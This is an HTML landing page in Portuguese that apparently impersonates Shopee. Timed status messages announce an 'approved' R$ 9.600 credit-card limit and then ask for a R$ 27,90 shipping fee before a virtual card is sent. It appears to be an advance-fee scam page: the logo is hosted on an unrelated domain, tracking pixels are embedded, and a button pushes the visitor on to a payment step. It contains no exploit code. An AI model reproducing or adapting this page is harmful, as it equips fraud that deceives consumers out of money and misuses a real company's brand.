﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Processando</title>



    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->


    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1F2937;
            line-height: 1.6;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
            flex-shrink: 0;
        }

        .main-content {
            max-width: 480px;
            margin: 30px auto;
            padding: 1rem;
            flex: 1;
        }

        .status-alert {
            background: white;
            border: 1px solid rgba(238, 77, 45, 0.1);
            padding: 1rem 1.25rem;
            border-radius: 12px;
            text-align: left;
            margin-bottom: 1rem;
            transition: all 0.3s ease;
            box-shadow: 0 2px 4px rgba(0,0,0,0.05);
            animation: fadeIn 0.5s ease;
        }

        .status-alert strong {
            color: #EE4D2D;
        }

        .status-alert.highlight {
            background: #FFF5F3;
            border-color: rgba(238, 77, 45, 0.2);
        }

        @keyframes fadeIn {
            from { 
                opacity: 0;
                transform: translateY(10px);
            }
            to { 
                opacity: 1;
                transform: translateY(0);
            }
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 50px;
            font-size: 1rem;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1.5rem;
            animation: fadeIn 0.5s ease;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .d-none {
            display: none;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 0;
            }

            .status-alert {
                margin-bottom: 0.75rem;
            }
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div class="main-content text-center">
        <div id="etapa1" class="status-alert d-none">
            Gerando a Taxa de Correios - PAC...
        </div>
        <div id="etapa2" class="status-alert d-none">
            Taxa de envio gerada com sucesso!
        </div>
        <div id="etapa3" class="status-alert highlight d-none">
            O limite do Cartão de Crédito <strong>aprovado</strong> é de <strong>R$ 9.600,00</strong>
        </div>
        <div id="etapa4" class="status-alert d-none">
            O prazo de entrega é de <strong>5 dias úteis</strong>
        </div>
        <div id="etapa5" class="status-alert d-none">
            O total do envio: <strong>R$ 27,90</strong>
        </div>
        <div id="etapa6" class="status-alert d-none">
            Após o pagamento da taxa de envio, em até <strong>2 horas</strong> iniciaremos o procedimento de envio
        </div>
        <div id="etapa7" class="status-alert highlight d-none">
            <strong>CARTÃO VIRTUAL COM LIMITE: R$ 9.600,00</strong>
        </div>
        <div id="etapa8" class="status-alert d-none">
            Será enviado para você um <strong>Cartão Virtual com limite de R$ 9.600</strong> para utilizá-lo imediatamente enquanto você aguarda o cartão físico chegar. Utilize hoje o virtual que enviaremos com as informações em seu WhatsApp.
        </div>
        
        <button id="confirmar" onclick="location.href='../card/index.php.html'" class="btn-custom d-none">
            QUERO MEU CARTÃO VIRTUAL AGORA!
        </button>
    </div>

    <script>
        function mostrarEtapas() {
            const intervalos = [1000, 3000, 5000, 7000, 9000, 11000, 13000, 15000, 17000];
            const elementos = ['etapa1', 'etapa2', 'etapa3', 'etapa4', 'etapa5', 'etapa6', 'etapa7', 'etapa8', 'confirmar'];
            
            elementos.forEach((el, index) => {
                setTimeout(() => {
                    document.getElementById(el).classList.remove('d-none');
                }, intervalos[index]);
            });
        }

        window.onload = mostrarEtapas;
    </script>


</body>
</html>